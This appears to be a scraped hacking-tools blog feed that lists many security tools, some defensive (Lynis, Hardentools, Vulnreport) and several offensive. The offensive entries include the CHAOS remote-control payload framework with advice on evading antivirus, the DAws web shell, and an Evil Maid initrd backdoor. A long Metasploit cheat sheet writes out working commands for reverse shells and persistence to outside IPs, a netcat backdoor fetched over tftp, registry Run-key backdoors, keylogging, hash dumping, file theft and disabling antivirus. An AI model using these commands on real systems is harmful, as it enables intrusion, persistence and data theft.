Channel: Hacking Tools – DigitalMunition

Lynis 2.5.2 – Security Auditing Tool for Unix/Linux Systems

We are excited to announce this major release of the auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next in a series of simplification improvements we have made. There is a risk of breaking your existing configuration.

Lynis is an open source security auditing tool, used by system administrators, security professionals, and auditors to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.


Supported operating systems
The tool has almost no dependencies, therefore it runs on almost all Unix-based systems and versions, including:
  • AIX
  • FreeBSD
  • HP-UX
  • Linux
  • Mac OS
  • NetBSD
  • OpenBSD
  • Solaris
  • and others
It even runs on systems like the Raspberry Pi and several storage devices!
Installation optional

Lynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use “./lynis audit system” to start the security scan. It is written in shell script and released as open source software (GPL).

How it works
Lynis performs hundreds of individual tests to determine the security state of the system. The security scan itself consists of a set of steps, from initializing the program up to the report.
Steps
  1. Determine operating system
  2. Search for available tools and utilities
  3. Check for Lynis update
  4. Run tests from enabled plugins
  5. Run security tests per category
  6. Report status of security scan
Besides the data displayed on the screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.
Opportunistic Scanning
Lynis scanning is opportunistic: it uses what it can find.
For example, if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers an SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates so they can be scanned later as well.
In-depth security scans
By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!
Use cases
Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
  • Security auditing
  • Compliance testing (e.g. PCI, HIPAA, SOx)
  • Vulnerability detection and scanning
  • System hardening
Resources used for testing
Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.
  • Best practices
  • CIS
  • NIST
  • NSA
  • OpenSCAP data
  • Vendor guides and recommendations (e.g. Debian, Gentoo, Red Hat)
Lynis Plugins

Plugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.

Changelog

Upgrade note

Lynis 2.5.2 (2017-07-10)


Changes:
--------
- Support for PHP on CloudLinux
- Check for presence of locale binary
- Suhosin detection improvements
- Generic code improvements
- Changed 'lynis audit system remote' routine
- Support for macOS High Sierra
- French translation updated

Lynis Enterprise:
-----------------
- Allow 'tags' and 'system-customer-name' to be specified via Lynis client

Tests:
------
* CONT-8102 - Check for dockerd instead of docker -d
* FIRE-4594 - Check for presence Advanced Policy Firewall (APF)
* PKGS-2379 - New test for PHP suhosin extension status
* PKGS-7370 - Only use debsums on Debian
* KRNL-6000 - Added kernel.dmesg_restrict testing

The post Lynis 2.5.2 – Security Auditing Tool for Unix/Linux Systems appeared first on DigitalMunition.


smap – Shellcode Mapper


Handy tool for shellcode analysis.
Demo video

Requirements

  • objdump

Installation and execution
You can download smap by cloning the Git repository:


git clone https://github.com/suraj-root/smap.git
cd smap/
python smap.py -h

Get shellcodes from http://shell-storm.org/shellcode/, https://www.exploit-db.com/shellcode/ and https://packetstormsecurity.com/files/tags/shellcode/.
For educational purposes only.


CHAOS Framework – Generate Payloads and Control Remote Machines

CHAOS Framework generates payloads and controls remote machines.
DISCLAIMER
The use of the CHAOS Framework is COMPLETE RESPONSIBILITY of the END-USER. Developer assumes NO liability and is NOT responsible for any misuse or damage caused by this program.
FEATURES
  • Windows Remote Control
  • Download File
  • Upload File
  • Persistence
  • Open Url Remotely
  • Get Operating System Name
  • Run Fork Bomb

TESTED ON
Kali Linux – ROLLING EDITION

USAGE
You need Golang and UPX package installed!

Install Prerequisites

# apt install golang upx-ucl -y

Cloning

git clone https://github.com/tiagorlampert/CHAOS.git

Running

cd CHAOS
go run CHAOS.go

Note: CHAOS has a delay of 70 seconds to bypass most of the antivirus and sandboxes.

VIDEO DEMONSTRATION

Don’t submit to VirusTotal or other scanning service. :3


dork-cli – Command-line Google Dork Tool


dork-cli is a Python-based command-line Google Dork tool that performs searches against Google’s custom search engine. A command-line option is always good, as it allows you to script it as part of your automated pen-testing suite.

It will return a list of all the unique page results it finds, optionally filtered by a set of dynamic page extensions.

Any number of additional query terms/dorks can be specified. dork-cli was designed to be piped into an external tool such as a vulnerability scanner for automated testing purposes.


Setup

In order to use this program you need to configure at a minimum two settings: a Google API key and a custom search engine id.

Custom Search Engine:

  • Create a custom search engine via https://www.google.com/cse/
  • Add your desired domain(s) under “Sites to search”
  • Click the “Search engine ID” button to reveal the id, or grab it from the “cx” URL parameter

API key:

  • Open the Google API console at https://code.google.com/apis/console
  • Enable the Custom Search API via APIs & auth > APIs
  • Create a new API key via APIs & auth > Credentials > Create new Key
  • Select “Browser key”, leave HTTP Referer blank and click Create

Usage


API Limitations

The free Google API limits you to 100 searches per day, with a maximum of 10 results per search. This means if you configure dork-cli.py to return 100 results, it will issue 10 queries (1/10th of your daily limit) each time it is run. You have the option to pay for additional searches via the Google API console. At the time of writing, signing up for billing on the Google API site gets you $300 free to spend on API calls for 60 days.

You can download dork-cli here:

dork-cli.py

Or read more here.


CloudFail – Utilize misconfigured DNS and old database records to find hidden IP’s behind the CloudFlare network


CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by CloudFlare in the hopes of discovering the location of the server. Using Tor to mask all requests, the tool as of right now has 3 different attack phases.

  1. Misconfigured DNS scan using DNSDumpster.com.
  2. Scan the Crimeflare.com database.
  3. Bruteforce scan over 2500 subdomains.

Please feel free to contribute to this project. If you have an idea or improvement issue a pull request!

Disclaimer
This tool is a PoC (Proof of Concept) and does not guarantee results. It is possible to setup CloudFlare properly so that the IP is never released or logged anywhere; this is not often the case and hence why this tool exists. This tool is only for academic purposes and testing under controlled environments. Do not use without obtaining proper authorization from the network owner of the network under testing. The author bears no responsibility for any misuse of the tool.

Usage
To run a scan against a target:

python cloudfail.py --target seo.com

To run a scan against a target using Tor:

service tor start


(or if you are using Windows or Mac install vidalia or just run the Tor browser)

python cloudfail.py --target seo.com --tor

Dependencies
Python3

  • argparse
  • colorama
  • socket
  • binascii
  • datetime
  • requests
  • win_inet_pton



Bluto – DNS Recon, Zone Transfer & Brute Forcer


Bluto is a Python-based tool for DNS recon, DNS zone transfer testing, DNS wild card checks, DNS brute forcing, e-mail enumeration and more.

The target domain is queried for MX and NS records. Sub-domains are passively gathered via NetCraft. The target domain NS records are each queried for potential Zone Transfers. If none of them gives up their spinach, Bluto will attempt to identify if SubDomain Wild Cards are being used.

If they are not, Bluto will brute force sub-domains using parallel sub-processing on the top 20000 of the ‘Alexa Top 1 Million subdomains’. If Wild Cards are in place, Bluto will still brute force sub-domains, but using a different technique which takes roughly 4 x longer.

NetCraft results are then presented individually and are then compared to the brute force results, any duplications are removed and particularly interesting results are highlighted.

Extra Features

Bluto now does email address enumeration based on the target domain, currently using the Bing and Google search engines plus gathering data from the Email Hunter service and LinkedIn. https://haveibeenpwned.com/ is then used to identify if any email addresses have been compromised. Previously Bluto produced an ‘Evidence Report’ on the screen; this has now been moved off screen and into an HTML report.

Search engine queries are configured to use a random User Agent on each request, and a country lookup is performed to select the fastest Google server in relation to your egress address. Each request closes the connection in an attempt to further avoid captchas; however, excessive lookups will result in captchas (Bluto will warn you if any are identified).


Usage

You can download Bluto here:

Bluto-2.01.zip

Or read more here.


Metasploit Cheatsheet


Cheat sheet of Metasploit. Commands are as follows.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false
# set AutoRunScript pathto script you want to autorun after exploit is run
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30

exploit -j -z


# file_autopwn
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3

wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR…s/nga10_02.pdf

./msfconsole

db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21

setg INFILENAME /tmp/file3.pdf

use auxiliary/server/file_autopwn

set OUTPATH /tmp/1

set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run


# shows all the scripts
run


# persistence! broken …if you use DNS name ..
run persistence -r 75.139.158.51 -p 21 -A -X -i 30


run get_pidgin_creds

idletime
sysinfo


# SYSTEM SHELL ( pick a proc that is run by system )
migrate 376
shell


# session hijack tokens
use incognito
impersonate_token "NT AUTHORITY\\SYSTEM"


# escalate to system
use priv
getsystem


execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t


# list top used apps
run prefetchtool -x 20


# list installed apps
run prefetchtool -p


run get_local_subnets


# find and download files
run search_dwld "%USERPROFILE%\\my documents" passwd
run search_dwld "%USERPROFILE%\\desktop" passwd
run search_dwld "%USERPROFILE%\\my documents" office
run search_dwld "%USERPROFILE%\\desktop" office


# alternate
download -r "%USERPROFILE%\\desktop" ~/
download -r "%USERPROFILE%\\my documents" ~/


# alternate to shell not SYSTEM
# execute -f cmd.exe -H -c -i -t


# does some run wmic commands etc
run winenum


# rev shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"


# An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.
run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4


# vnc / port fwd for linux
run vnc


# priv esc
run kitrap0d


run getgui


# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!
run killav

run winemun

run memdump

run screen_unlock



upload /tmp/system32.exe C:\\windows\\system32\\
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v system32
reg enumkey -k HKLM\\system\\controlset001\\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list
reg setval -k HKLM\\system\\controlset001\\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v system32
upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"


getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666


shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787


run msf_bind
run msf_bind -p 1975
rev2self
getuid


getuid

enumdesktops
grabdesktop

run deploymsf -f framework-3.3-dev.exe

run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d google.com
run netenum -rl -r 10.192.0.50-10.192.0.254
run netenum -st -d google.com
run netenum -ps -r 10.192.0.50-254


# Windows Login Brute Force Meterpreter Script
run winbf -h


# upload a script or executable and run it
uploadexec


# Using Payload As A Backdoor from a shell

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe" /ED 11/11/2011


# kill AV this will not unload it from mem it needs reboot or kill from memory still … Darkspy, Seem, Icesword GUI can kill the tasks
catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" dummy


Eternal – An internet scanner for Eternal Blue [exploit CVE-2017-0144]


Eternal scanner is a network scanner for the Eternal Blue exploit (CVE-2017-0144).

Requirements

  • masscan
  • metasploit-framework

How to Install

Install Requirements

  • apt-get install masscan metasploit-framework

Screenshots




Hardentools – Utility that disables a number of risky Windows features

Hardentools is a collection of simple utilities designed to disable a number of “features” exposed by operating systems (Microsoft Windows, for now) and primary consumer applications. These features, commonly intended for enterprise customers, are generally useless to regular users and rather pose a danger, as they are very commonly abused by attackers to execute malicious code on a victim’s computer. The intent of this tool is simply to reduce the attack surface by disabling the low-hanging fruit. Hardentools is intended for individuals at risk who might want an extra level of security at the price of some usability. It is not intended for corporate environments.
WARNING: This is just an experiment, it is not meant for public distribution yet. Also, this tool disables a number of features, including of Microsoft Office, Adobe Reader, and Windows, that might cause malfunctions to certain applications. Use this at your own risk.
Bear in mind, after running Hardentools you won’t be able, for example, to do complex calculations with Microsoft Office Excel or use the Command-line terminal, but those are pretty much the only considerable “downsides” of having a slightly safer Windows environment. Before deciding to use it, make sure you read this document thoroughly and understand that yes, something might break. In case you experience malfunctions as a result of the modifications implemented by this tool, please do let us know.
How to use it
Once you double-click on the icon, depending on your Windows security settings, you should be prompted with a User Account Control dialog asking for your confirmation to allow Hardentools to run. Click “Yes”.


Then, you will see the main Hardentools window. It’s very simple, you just click on the “Harden” button, and the tool will make the changes to your Windows configuration to disable a set of features that are risky. Once completed, you will be asked to restart your computer for all the changes to have full effect.


In case you wish to restore the default settings and revert the changes Hardentools made (for example, if you need to use cmd.exe), you can simply re-run the tool, and instead of a “Harden” button you will be presented with a “Restore” button. Similarly, click it and wait for the modifications to be reverted.
In the future, we will create the ability to select or deselect certain modifications Hardentools is configured to make.
Please note: the modifications made by Hardentools are exclusively contextual to the Windows user account used to run the tool from. In case you want Hardentools to change settings for other Windows users as well, you will have to run it from each one of them logged in.
What this tool does NOT do
  • It does NOT prevent software from being exploited.
  • It does NOT prevent the abuse of every available risky feature.
  • It is NOT an Antivirus. It does not protect your computer. It doesn’t identify, block, or remove any malware.
  • It does NOT prevent the changes it implements from being reverted. If malicious code runs on the system and it is able to restore them, the premise of the tool is defeated, isn’t it?
Disabled Features
Generic Windows Features
  • Disable Windows Script Host. Windows Script Host allows the execution of VBScript and Javascript files on Windows operating systems. This is very commonly used by regular malware (such as ransomware) as well as targeted malware.
  • Disable AutoRun and AutoPlay. Disables AutoRun / AutoPlay for all devices. For example, this should prevent applications from automatically executing when you plug a USB stick into your computer.
  • Disables powershell.exe, powershell_ise.exe and cmd.exe execution via Windows Explorer. You will not be able to use the terminal and it should prevent the use of PowerShell by malicious code trying to infect the system.
  • Sets User Account Control (UAC) to always ask for permission (even on configuration changes only) and to use “secure desktop”.
  • Disable file extensions mainly used for malicious purposes. Disables the “.hta”, “.js”, “.JSE”, “.WSH”, “.WSF”, “.scr”, “.vbs” and “.pif” file extensions for the current user (and for system wide defaults, which is only relevant for newly created users).
Microsoft Office
  • Disable Macros. Macros are at times used by Microsoft Office users to script and automate certain activities, especially calculations with Microsoft Excel. However, macros are currently a security plague, and they are widely used as a vehicle for compromise. With Hardentools, macros are disabled and the “Enable this Content” notification is disabled too, to prevent users from being tricked.
  • Disable OLE object execution. Microsoft Office applications are able to embed so called “OLE objects” and execute them, at times also automatically (for example through PowerPoint animations). Windows executables, such as spyware, can also be embedded and executed as an object. This is also a security disaster which we observed used time and time again, particularly in attacks against activists in repressed regions. Hardentools entirely disables this functionality.
  • Disabling ActiveX. Disables ActiveX Controls for all Office applications.


Acrobat Reader
  • Disable JavaScript in PDF documents. Acrobat Reader allows JavaScript code to be executed from within PDF documents. This is widely abused for exploitation and malicious activity.
  • Disable execution of objects embedded in PDF documents. Acrobat Reader also allows embedded objects to be executed by opening them. This would normally raise a security alert, but given that legitimate uses of this are rare and limited, Hardentools disables this.
Authors
This tool is developed by Claudio Guarnieri, Mariano Graziano and Florian Probst.



NagaScan – Distributed Passive Scanner for Web Application

What is NagaScan
NagaScan is a distributed passive vulnerability scanner for Web applications.
What NagaScan does
NagaScan currently supports some common Web application vulnerabilities, e.g. XSS, SQL Injection, File Inclusion, etc.
How NagaScan works
Configure a proxy, e.g. a Web browser proxy or a mobile Wi-Fi proxy; the traffic (including request headers, cookies, POST data, URLs, etc.) is mirrored and parsed into the central database, and the scan tasks are then automatically assigned to distributed scanners that check for the common Web application vulnerabilities.

Requirements

Web Console

  • sudo pip install mysql-connector
  • sudo pip install jinja2
  • sudo pip install bleach

Scanner

  • sudo apt-get install python-pip python-dev libmysqlclient-dev
  • sudo pip install requests
  • sudo pip install MySQL-python
  • sudo pip install -U selenium
  • sudo apt-get install libfontconfig

Proxy

  • sudo apt-get install python-pip python-dev libmysqlclient-dev
  • sudo pip install MySQL-python

Installation & Configuration

Database

  • Install MySQL and create a db user and password, e.g. root/toor
  • Create database for NagaScan by using command source schema.sql

Web Console

  • Modify www/config_override.py with your own DB configuration for Web console
configs = {
    'db': {
        'host': '127.0.0.1',
        'user': 'root',
        'password': 'toor'
    }
}
  • Run sudo python www/wsgiapp.py to start Web console

Scanner

  • Modify scanner/lib/db_operation.py with your own DB configuration for Scanner
def db_conn():
    try:
        user = "root"
        pwd = "toor"
        hostname = "127.0.0.1"
self.executable_path='[Your Own Phantomjs Binary Path]' # e.g. /home/ubuntu/phantomjs-2.1.1-linux-x86_64/bin/phantomjs
  • Run below commands to start Scanner
    • python scanner/scan_fi.py to scan File Inclusion
    • python scanner/scan_xss.py to scan XSS
    • python scanner/scan_sqli.py to scan SQL injection

Proxy & Parser

  • Install MitmProxy
    • Ubuntu 16.04 (Preferred):
      • sudo apt-get install python3-dev python3-pip libffi-dev libssl-dev
      • sudo pip3 install mitmproxy
    • Ubuntu 14.04:
      • sudo apt-get install python-pip python-dev libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg8-dev zlib1g-dev
      • sudo pip install “mitmproxy==0.18.2”
    • MacOS:
      • brew install python3
      • brew install mitmproxy
  • Run mitmdump -p 443 -s "proxy/proxy_mitmproxy.py /tmp/logs.txt" to start Proxy
  • Modify parser/lib/db_operation.py with your own DB configuration for Parser
def db_conn():
    try:
        user = "root"
        pwd = "toor"
        hostname = "127.0.0.1"
  • Run python parser/parser_mitmproxy.py /tmp/logs.txt to start Parser


Usage

  • Access to Web Console with the default username and password (nagascan@example.com/Naga5c@n) to config exclusions and add SQLMAP server


  • Install the MitmProxy certificates for your Browser or Mobile device per the instructions
  • Add a proxy you created in your Web Browser or Mobile Wi-Fi
  • Just browse websites from Browser or use APPs from Mobile whatever you like
  • Have fun!



ReconDog – An All In One Tool For All Your Basic Information Gathering Needs


Recon Dog is an all in one tool for all your basic information gathering needs. It uses APIs to gather all the information so your identity is not exposed.
Downloading and running Recon Dog

Enter the following command in the terminal to download it

git clone https://github.com/UltimateHackers/ReconDog

After downloading the program, enter the following command to navigate to the Recon Dog directory and list its contents

cd ReconDog && ls

Now run the script with following command.

python dog.py



CyberChef – Cyber Swiss Army Knife


CyberChef is a simple, intuitive web app for carrying out all manner of “cyber” operations within a web browser. These operations include simple encoding like XOR or Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509 parsing, changing character encodings, and much more.

The tool is designed to enable both technical and non-technical analysts to manipulate data in complex ways without having to deal with complex tools or algorithms. It was conceived, designed, built and incrementally improved by an analyst in their 10% innovation time over several years. Every effort has been made to structure the code in a readable and extendable format, however it should be noted that the analyst is not a professional developer.


Features

  • Drag and drop
    • Operations can be dragged in and out of the recipe list, or reorganised.
    • Files can be dragged over the input box to load them directly.
  • Auto Bake
    • Whenever you modify the input or the recipe, CyberChef will automatically “bake” for you and produce the output immediately.
    • This can be turned off and operated manually if it is affecting performance (if the input is very large, for instance).
    • If any bake takes longer than 200 milliseconds, auto bake will be switched off automatically to prevent further performance issues.
  • Breakpoints
    • You can set breakpoints on any operation in your recipe to pause execution before running it.
    • You can also step through the recipe one operation at a time to see what the data looks like at each stage.


  • Save and load recipes
    • If you come up with an awesome recipe that you know you’ll want to use again, just click save and add it to your local storage. It’ll be waiting for you next time you visit CyberChef.
    • You can also copy a URL which includes your recipe and input which can be shared with others.
  • Search
    • If you know the name of the operation you want or a word associated with it, start typing it into the search field and any matching operations will immediately be shown.
  • Highlighting
    • When you highlight text in the input or output, the offset and length values will be displayed and, if possible, the corresponding data will be highlighted in the output or input respectively.
  • Save to file and load from file
    • You can save the output to a file at any time or load a file by dragging and dropping it into the input field (note that files larger than about 500kb may cause your browser to hang or even crash due to the way that browsers handle large amounts of textual data).
  • CyberChef is entirely client-side
    • It should be noted that none of your input or recipe configuration is ever sent to the CyberChef web server – all processing is carried out within your browser, on your own computer.
    • Due to this feature, CyberChef can be compiled into a single HTML file. You can download this file and drop it into a virtual machine, share it with other people, or use it independently on your desktop.

Browser support

CyberChef is built to support:

  • Google Chrome 40+
  • Mozilla Firefox 35+
  • Microsoft Edge 14+

You can find a live demo here: CyberChef

You can download CyberChef here:

CyberChef-v5.12.0.zip

Or read more here.


inforfinder – Tool To Collect Information Of Any Domains Pointing At Some Server (Ip, Domain, Range, File)


inforfinder is a tool made to collect information on any domain pointing at a server (IP, domain, range, file).
Requires python libs: pyRequests and pyDNS
-First, you need to install complementary libraries:

user@machine$ sudo apt-get install python-dns python-dnspython python-requests python-lxml python

OR

pip install  pydns
pip install requests --upgrade
pip install  lxml

-Then Download “inforfinder”
-The next step is to run “inforfinder.py”: python inforfinder.py --help
Find more information on how to use this app:

 InforFinder v1.0.9 Powered By GGUsoft 2017

 Powered By GGUsoft 2017

 Commands:

 -d <dominio>    Gets a domain for apply any optional commands

 -dD <dominio>    Gets a domain list hosted in IP of the specified domain

 -dI <IP>    Gets a domain list hosted in the specified IP

 -dR <IP inicio> <IP fin>  Gets a domain list hosted in every IP of the specified range

 -dF <file>    Gets a list with all domains hosted at same IP from a file, the file contens a IP by line


 Optionals:

 inforfinder <command> -cms    Checks if every domain found has a cms website (wordpress, joomla, etc) and show version

 inforfinder <command> -servinfo    Checks web server parameters

 inforfinder <command> --subdomain-enum    Lists subdomains of every domain found



WSSAT – Web Service Security Assessment Tool

WSSAT is an open source web service security scanning tool which provides a dynamic environment to add, update or delete vulnerabilities by just editing its configuration files. This tool accepts a list of WSDL addresses as its input file and, for each service, performs both static and dynamic tests against the security vulnerabilities. It also performs information disclosure checks. With this tool, all web services can be analyzed at once and the overall security assessment can be seen by the organization.
The objectives of WSSAT are to allow organizations to:
  • Perform their web services security analysis at once
  • See overall security assessment with reports
  • Harden their web services
WSSAT’s main capabilities include:
Dynamic Testing:
  • Insecure Communication – SSL Not Used
  • Unauthenticated Service Method
  • Error Based SQL Injection
  • Cross Site Scripting
  • XML Bomb
  • External Entity Attack – XXE
  • XPATH Injection
  • Verbose SOAP Fault Message
Static Analysis:
  • Weak XML Schema: Unbounded Occurrences
  • Weak XML Schema: Undefined Namespace
  • Weak WS-SecurityPolicy: Insecure Transport
  • Weak WS-SecurityPolicy: Insufficient Supporting Token Protection
  • Weak WS-SecurityPolicy: Tokens Not Protected


Information Leakage:
  • Server or technology information disclosure
WSSAT’s main modules are:
  • Parser
  • Vulnerabilities Loader
  • Analyzer/Attacker
  • Logger
  • Report Generator
What sets WSSAT apart is that it provides a dynamic vulnerability management environment instead of embedding the vulnerabilities in the code.
This project was developed as a term project in the Software Management master’s program at Middle East Technical University (METU).


DAws – Advanced Web Shell


There are multiple things that make DAws better than every web shell out there:

  1. Bypasses Security Systems (IPS, WAFs, etc.) like Suhosin (uses up to 20 PHP functions just to get a command executed).
  2. Drops CGI shells and communicates with them to bypass Security Systems.
  3. Uses the SSH Authorized Keys method to bypass Security Systems.
  4. Uses Shellshock in 2 methods to bypass Security Systems.
  5. Is completely POST based and uses an XOR encryption based on a random key that gets generated with every new session + private base64 functions to bypass Security Systems.
  6. Supports Windows and Linux.
  7. Finds a writeable and readable directory and moves there if it’s a web directory; DAws will output everything in that found directory.
  8. Drops a php.ini and a .htaccess file that clears all disablers in case “suphp” was installed.
  9. Has an advanced File Manager.
  10. Everything is done automatically so there’s nothing for the user to worry about.
  11. Open Source.
  12. and much more (check the source for more information; everything is well commented).

Credits:



ASTo – An IoT Network Security Analysis Tool and Visualizer

ASTo is a security analysis tool for IoT networks. It was developed to support the Apparatus security framework. ASTo is based on Electron and cytoscape.js. The icons are provided by Google’s Material Design.
The application is still in prototyping stage, which means a lot of functionality is being added with each commit, along with massive changes in almost everything.


To Use
To clone and run this repository you’ll need Git and Node.js installed on your computer. To download and install the app, type the following in your terminal:

# Clone this repository
git clone https://github.com/Or3stis/apparatus.git
# Go into the repository
cd apparatus
# Install dependencies
npm install
# to run the app
npm start


Because the app is still in prototype stage, it is best to keep up to date with the most recent commits. To do so, before starting the app, type:

# inside the apparatus directory

# update to latest
git pull

The first window (home screen) will ask you to choose which modeling phase you would like to perform analysis in. After you select a phase, a native dialog window will ask you to choose a file to load. By default, you can only choose .js or .json files.
You will find some example graphs in the graphs folder.

Instructions
If you want to contribute that’s great news. Check the contributing guide. The application is being developed on Mac. That means that new commits might introduce breaking changes in other platforms. Especially commits that involve access to the file system. If something is not working, don’t hesitate to create an issue.
If you want to find out how the app works check the wiki.
You can check the project’s planned features in the roadmap.


EvilAbigail – Automated Evil Maid Attack For Linux


EvilAbigail is a Python-based tool that allows you to run an automated Evil Maid attack on Linux systems; specifically, it implements the initrd attack against an encrypted root filesystem. An Evil Maid attack is a type of attack that targets a computer device that has been shut down and left unattended.

An Evil Maid attack is characterized by the attacker’s ability to physically access the target multiple times without the owner’s knowledge.


Scenarios

  • Laptop left turned off with FDE turned on
  • Attacker boots from USB/CD/Network
  • Script executes and backdoors initrd
  • User returns to laptop, boots as normal
  • Backdoored initrd loads:
    • (Debian/Ubuntu/Kali) .so file into /sbin/init on boot, dropping a shell
    • (Fedora/CentOS) LD_PRELOAD .so into DefaultEnviroment, loaded globally, dropping a shell.

Supported Distros

  • Ubuntu 14.04.3
  • Debian 8.2.0
  • Kali 2.0
  • Fedora 23
  • CentOS 7


You can download EvilAbigail here:

EvilAbigail-master.zip

Or read more here.


Twiga – A Tool That Enumerates Android Devices For Information Useful In Understanding Its Internals And For Exploit Development


A tool that enumerates Android devices for information useful in understanding their internals and for exploit development. It supports Android 4.2 to Android 7.1.1.
Requirements

  • The most current ADB must be in your path and fully functional
  • The report name must not have any whitespace

Limitations

  • Some information and files cannot be pulled on higher SDK versions due to strict SELinux policies and Android hardening.
  • It can only run on one device at a time for now

To Do

  • Support for enumeration on a rooted device
  • Support enumeration on multiple devices at a time
  • Generate a PDF report from the enumeration data


Inspired by


Vulnreport – Pentesting Management And Automation Platform

Vulnreport is a platform for managing penetration tests and generating well-formatted, actionable findings reports without the normal overhead that eats up security engineers’ time. The platform is built to support automation at every stage of the process and allows customization for whatever other systems you use as part of your pentesting process.
Vulnreport was built by the Salesforce Product Security team as a way to get rid of the time we spent writing, formatting, and proofing reports for penetration tests. Our goal was and continues to be to build great security tools that let pentesters and security engineers focus on finding and fixing vulns.
For full documentation, see http://vulnreport.io/documentation

Deployment
Vulnreport is a Ruby web application (Sinatra/Rack stack) backed by a PostgreSQL database with a Redis cache layer.
Vulnreport can be installed on a local VM or server behind something like nginx, or can be deployed to Heroku.

Local Deploy / Your own server
To deploy locally, you’ll need to make sure you have installed the dependencies:

  • Ruby >= 2.1
  • PostgreSQL
  • Redis
  • Rollbar
  • Bundler

Clone the repo and open up the .env file, updating it as necessary. Then run bundle install. You’ll probably want to modify start.sh to make it work for your environment – the one included in the repo is intended for local use during debugging/development.
You should also create a .env file based on .env.example, or set the same ENV variables defined in .env in your environment.

Heroku Deploy

Automatic Deployment
You can automatically deploy to Heroku. After doing so, follow the instructions below to log in to Vulnreport and finish configuration.

Manual Deployment
To deploy to Heroku (assuming you have created a Heroku app and have the toolbelt installed)

git clone [Vulnreport repo url]

heroku git:remote -a [Heroku app name]

heroku addons:create heroku-postgresql:hobby-dev
heroku addons:create heroku-redis:hobby-dev
heroku addons:create rollbar:free
heroku addons:create sendgrid:starter

You’ll then want to open up the .env file and copy the keys/values (updating values where necessary) to the Heroku settings for your app. This can also be done via the toolbelt CLI commands. Note that the default ENV variables after running the addons should be fine, but you can double check. You’ll definitely want to update VR_SESSION_SECRET. If this isn’t your production install, you should change RACK_ENV to development.

heroku config:set VR_SESSION_SECRET=abc123456
heroku config:set RACK_ENV=production

git push heroku master

You can now follow the instructions for installation as you would if you were running Vulnreport locally.

Installation
To handle the initial configuration for Vulnreport, run the SEED.rb script. If you are deploying on Heroku, run this via heroku run ./SEED.rb.
If you used the automated ‘Deploy to Heroku’ feature, this step should have been handled for you automatically.

Running ./SEED.rb on ⏢ vulnreport-test... up, run.8035

Vulnreport 3.0.0.alpha seed script
WARNING: This script should be run ONCE immediately after deploying and then DELETED

Setting up Vulnreport now...

Setting up the PostgreSQL database...
 Done

Seeding the database...
 Done

User ID 1 created for you


ALL DONE! :)
Login to Vulnreport now and go through the rest of the settings!

Now, delete the SEED.rb file.
The default admin user has been created for you with username admin and password admin. This should be immediately rotated and/or SSO should be configured.
At this point you should go to your Vulnreport URL (e.g. https://my-vr-test.herokuapp.com above) and log in with the user created. Go through the Vulnreport and user settings to configure your instance of Vulnreport.

Pentest!
